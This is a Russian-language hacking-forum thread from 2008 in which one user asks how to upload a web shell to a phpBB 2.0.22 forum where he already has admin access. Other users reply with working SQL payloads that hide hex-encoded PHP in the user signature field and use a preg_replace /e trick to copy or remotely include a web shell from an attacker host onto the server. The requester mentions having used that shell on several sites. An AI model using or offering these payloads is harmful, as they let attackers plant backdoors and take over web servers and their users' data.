Форумы заливка shell - phpbb2

Discussion in 'Уязвимости CMS/форумов' started by number0, 17 Apr 2008.

  1. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Здраствуйте! Версия форума 2.0.22 чистый (без модов). Что есть:
    1. админский акуант (доступ в админку)
    2. серверный путь к форуму
    3. config.php
    ftp доступа нету. =( БД не root.

    Собственно вопрос... как загрузить shell ?
     
  2. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    глянь
    https://forum.antichat.ru/thread24488.html
    и тут на ачате видео еще было по заливки шелла через бд
     
  3. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    если file_priv=N
    то никакое видео не поможет, и врятли что то можно сделать
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    несколько раз заливал через
    но при этом у меня всегда был доступ к БД, через phpMyAdmin
    насчет твоей версии незнаю
     
    1 person likes this.
  5. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    на форуме майскл имеет права file_priv=N
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    для того способа который я сказал file_priv не имеет значения
     
  7. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Да, сроботал. PHP Version показало.
    мм.. может уже есть и готовый шелл под скрипт выше указаный? С99 хотелось бы...
     
    #7 number0, 17 Apr 2008
    Last edited: 17 Apr 2008
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в user_sig пропиши phpbb:copy("http://путь до шелла/шелл.txt","/путь до папки/куда лить/шелл.php")
     
  9. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Не дало востановить БД. Где-то ошибочку допустил.. подправте пожалуйста.

     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F3139322E3136382E31302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;
    не забудь пробелы убрать здесь:
    F2F3 139322E3136382E31302E352F64622E747874222C222F76617 22F
     
    1 person likes this.
  11. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Scipio я так понял тут привязка пошла к 192.168.10.5 ? Походу да.. не вышло. Возможно из-за того что 192.168.10.5 в другой под сети...
    Если не трудно. то пожалуйста зделай под IP 10.0.0.5
     
  12. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F31302E302E302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;
    надеюсь на 10.0.0.5 поднят вебсервер?
     
  13. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Конечно, стоит апач с подержкой пхп.
    Сообствено написало что БД успешно востановлена... но при входе в "профиль" просто пустая белая страница.
    И при заходе на /forum/db.php

     
    #13 number0, 17 Apr 2008
    Last edited: 17 Apr 2008
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ну если все удачно прошло, то здесь /var/www/html/forum/ будет шелл с именем db.php
     
  15. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Scipio читай выше.. (я пост просто отредактировал). Что-то видать не верно..
     
  16. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    прочитайте пост #3 три раза
    одно дело ты записываешь функцию в базу, а другое записывать файл с помощью базы, если прав на работу с файлами нет, хоть об стенку бейся ни че не выйдет!
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    да причем здесь это, заливка происходит средствами php а не mysql

    2number0, возможно нет прав на запись в эту папку, ищи папку где точно есть права на запись, например можно попробовать папку с аватарами, попробуй так:
    Code:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A696E636C7564652022687474703A2F2F31302E302E302E352F64622E74787422 WHERE user_id=2;
    это инклюд
     
  18. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Успешно БД востановило... профиль по прежнему пустой. Собственно что должно было выполнится?
     
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    должен был шелл http://10.0.0.5/db.txt проинклюдиться, db.txt- это точно полноценный вебшел?
     
  20. number0

    number0 Banned

    Joined:
    1 Mar 2008
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    Да полностью роботает, использовал его не на одном сайте.